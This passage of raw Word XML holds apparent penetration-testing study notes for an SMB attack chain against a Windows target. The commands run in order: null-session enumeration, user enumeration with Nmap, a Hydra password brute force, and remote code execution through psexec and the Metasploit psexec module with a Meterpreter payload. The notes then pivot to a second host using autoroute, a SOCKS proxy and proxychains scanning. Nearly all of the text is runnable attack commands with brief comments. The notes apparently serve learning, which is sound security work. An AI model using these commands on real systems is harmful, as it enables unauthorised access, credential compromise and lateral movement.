      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-security-mode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24C2FEB5" w14:textId="1101D6DB" w:rsidR="009139EB" w:rsidRDefault="009139EB" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve"># guest user id the default user so it is not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>much</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> useful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D450812" w14:textId="77777777" w:rsidR="009139EB" w:rsidRDefault="009139EB" w:rsidP="005E3287"/>
    <w:p w14:paraId="1BF83F9E" w14:textId="4B853494" w:rsidR="009139EB" w:rsidRDefault="009139EB" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">#check for anonymous </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>session(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>null session)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBE82AC" w14:textId="42F454A4" w:rsidR="009139EB" w:rsidRDefault="009139EB" w:rsidP="005E3287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -L </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24DA51C3" w14:textId="39BB75B8" w:rsidR="009139EB" w:rsidRDefault="009139EB" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>just</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> enter no enter the password you get access (anonymous access granted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1AC7FE" w14:textId="77777777" w:rsidR="009139EB" w:rsidRDefault="009139EB" w:rsidP="005E3287"/>
    <w:p w14:paraId="77633625" w14:textId="77777777" w:rsidR="009139EB" w:rsidRDefault="009139EB" w:rsidP="005E3287">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">#username enumeration as it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>allow</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> anonymous login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30384B73" w14:textId="77777777" w:rsidR="009139EB" w:rsidRDefault="009139EB" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">Nmap -p445 –script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb-enum-users.nse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09958224" w14:textId="1A14EF98" w:rsidR="009139EB" w:rsidRDefault="009139EB" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D48174" w14:textId="24A241BA" w:rsidR="007939D3" w:rsidRDefault="007939D3" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">#perfrom the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the user found and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> valid </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">then use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rremote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code execute or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for authentication via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE58E5D" w14:textId="363A6344" w:rsidR="007939D3" w:rsidRDefault="007939D3" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>create</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> find contain the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>finded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> username </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102D326A" w14:textId="4570CDCA" w:rsidR="007939D3" w:rsidRDefault="007939D3" w:rsidP="005E3287">
      <w:r>
        <w:t>Vim users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E358C0C" w14:textId="7E0916E0" w:rsidR="007939D3" w:rsidRDefault="007939D3" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">#to exit </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>vim</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we use </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>“:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BAA0AE" w14:textId="77777777" w:rsidR="007939D3" w:rsidRDefault="007939D3" w:rsidP="005E3287"/>
    <w:p w14:paraId="3A471A89" w14:textId="3837D298" w:rsidR="007939D3" w:rsidRDefault="007939D3" w:rsidP="005E3287">
      <w:r>
        <w:t>Hydra -L users.txt -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/Metasploit-framework/data/wordlists/unix_password.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BA727D" w14:textId="51FF32DD" w:rsidR="009139EB" w:rsidRDefault="007939D3" w:rsidP="005E3287">
      <w:r>
        <w:t>#bruteforce successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D177D0" w14:textId="77777777" w:rsidR="007939D3" w:rsidRDefault="007939D3" w:rsidP="005E3287"/>
    <w:p w14:paraId="61581FD3" w14:textId="0CC9BCEB" w:rsidR="007939D3" w:rsidRDefault="007939D3" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="007939D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007939D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007939D3">
        <w:t xml:space="preserve"> — a small </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007939D3">
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007939D3">
        <w:t xml:space="preserve"> utility that runs processes on remote Windows machines</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D50101" w14:textId="166A03A5" w:rsidR="007939D3" w:rsidRDefault="007939D3" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">psexec.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>administrator@target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09989199" w14:textId="3D1654F4" w:rsidR="007C1991" w:rsidRDefault="007939D3" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">#promot for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="007C1991">
        <w:t xml:space="preserve"> and get access to the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D77F797" w14:textId="400BCDD8" w:rsidR="007C1991" w:rsidRDefault="007C1991" w:rsidP="005E3287">
      <w:r>
        <w:t>#in session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F72F6D" w14:textId="2A9E7369" w:rsidR="007C1991" w:rsidRDefault="00796EE5" w:rsidP="005E3287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22EC7F72" w14:textId="5617359F" w:rsidR="00796EE5" w:rsidRDefault="00796EE5" w:rsidP="005E3287">
      <w:r>
        <w:t>Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3685B32A" w14:textId="77777777" w:rsidR="00796EE5" w:rsidRDefault="00796EE5" w:rsidP="005E3287"/>
    <w:p w14:paraId="2E1CA004" w14:textId="3EB64B90" w:rsidR="00796EE5" w:rsidRDefault="00796EE5" w:rsidP="005E3287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A282C8" w14:textId="289BC025" w:rsidR="00796EE5" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4686DE1A" w14:textId="330FC8E3" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC1883B" w14:textId="35B98026" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28761071" wp14:editId="3BD1FB6D">
            <wp:extent cx="2667137" cy="273064"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1961565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65178" name="Picture 19615651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FF36" w14:textId="14F7698A" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B90A56B" w14:textId="6DCD058F" w:rsidR="007939D3" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C1A8063" w14:textId="6A6EF191" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629380E5" w14:textId="2A041659" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> password1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D505787" w14:textId="61E8A5BE" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592797D3" w14:textId="1D6C1461" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>donot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> get the session </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>then</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> change the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1643D8" w14:textId="443F2DD5" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>Set payload windows/x64/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6ED9DFF3" w14:textId="36BC2E39" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C2A3FC" w14:textId="07516E34" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">#in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2CB9EA" w14:textId="3B873634" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A4B751C" w14:textId="1BCD2DF5" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD0B705" w14:textId="77777777" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287"/>
    <w:p w14:paraId="3CC760BD" w14:textId="603C43BB" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ping</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4F9D">
        <w:t>second system in this session.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E8A79" w14:textId="3C198CC2" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>Ping target2_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B55DE0" w14:textId="78D1EB58" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>#we able to ping from here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017225F9" w14:textId="2C42B706" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F19A953" w14:textId="77777777" w:rsidR="004D4F9D" w:rsidRDefault="004D4F9D" w:rsidP="005E3287"/>
    <w:p w14:paraId="792FD849" w14:textId="41691721" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t>Run autoroute -s target2_ip/subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3B479B" w14:textId="77777777" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287"/>
    <w:p w14:paraId="491006FE" w14:textId="60CAE591" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1C5B68" w14:textId="6B2B0CCA" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">#Search proxy on attacker machine  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BC6085" w14:textId="7C4563F3" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287"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proxychains.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="78837E55" w14:textId="3AA42984" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4979719D" w14:textId="53085E37" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="00D203A6">
      <w:r>
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/proxychains4.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BD9D5" w14:textId="24F788FD" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t>#found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123CF3F5" w14:textId="1EF62DB4" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t xml:space="preserve">#setup system vise proxy on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00C6C31D" w14:textId="5A2A8BD3" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> socks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F76217" w14:textId="32BBC4C9" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>socks_proxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E63AAD" w14:textId="38A65C38" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FA67BF" w14:textId="09180890" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t>Set version 4 # that the socks version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D3D390" w14:textId="2678AE64" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="00D203A6">
      <w:r>
        <w:t xml:space="preserve">Set SRVPORT 9050 # found in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>file  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/proxychains4.conf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="66E3AA92" w14:textId="3B2B5D72" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B07A30" w14:textId="77777777" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287"/>
    <w:p w14:paraId="43E2F33D" w14:textId="0DE9A5FB" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t>#Now on the attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749EDF4E" w14:textId="1A2A8E33" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t>#check is the proxy is set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1247C1" w14:textId="5A4B46E1" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Nestat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>antp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="178C54BB" w14:textId="551BB666" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve"> shows </w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all TCP connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve"> in numeric form plus the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>process (PID/program)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve"> owning each socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586D29C0" w14:textId="77777777" w:rsidR="00D203A6" w:rsidRPr="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="00D203A6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D203A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE78D94" w14:textId="77777777" w:rsidR="00D203A6" w:rsidRPr="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="00D203A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve">-a — show </w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve"> sockets (listening + non-listening).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442F5702" w14:textId="77777777" w:rsidR="00D203A6" w:rsidRPr="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="00D203A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve">-n — show </w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>numeric</w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve"> addresses/ports (no DNS/hostname lookups).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6729C576" w14:textId="77777777" w:rsidR="00D203A6" w:rsidRPr="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="00D203A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve">-t — show </w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve"> sockets only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4889229F" w14:textId="77777777" w:rsidR="00D203A6" w:rsidRPr="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="00D203A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve">-p — show </w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PID/program name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D203A6">
        <w:t xml:space="preserve"> owning the socket (requires root).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D65B92" w14:textId="77777777" w:rsidR="00D203A6" w:rsidRDefault="00D203A6" w:rsidP="005E3287"/>
    <w:p w14:paraId="5E5612D2" w14:textId="1E89DD58" w:rsidR="00D203A6" w:rsidRDefault="00A12517" w:rsidP="005E3287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Proxychains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target2_ip -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sT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445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723150FA" w14:textId="68C25F16" w:rsidR="00A12517" w:rsidRDefault="00A12517" w:rsidP="005E3287">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DA076F" w14:textId="77777777" w:rsidR="00A12517" w:rsidRDefault="00A12517" w:rsidP="005E3287"/>
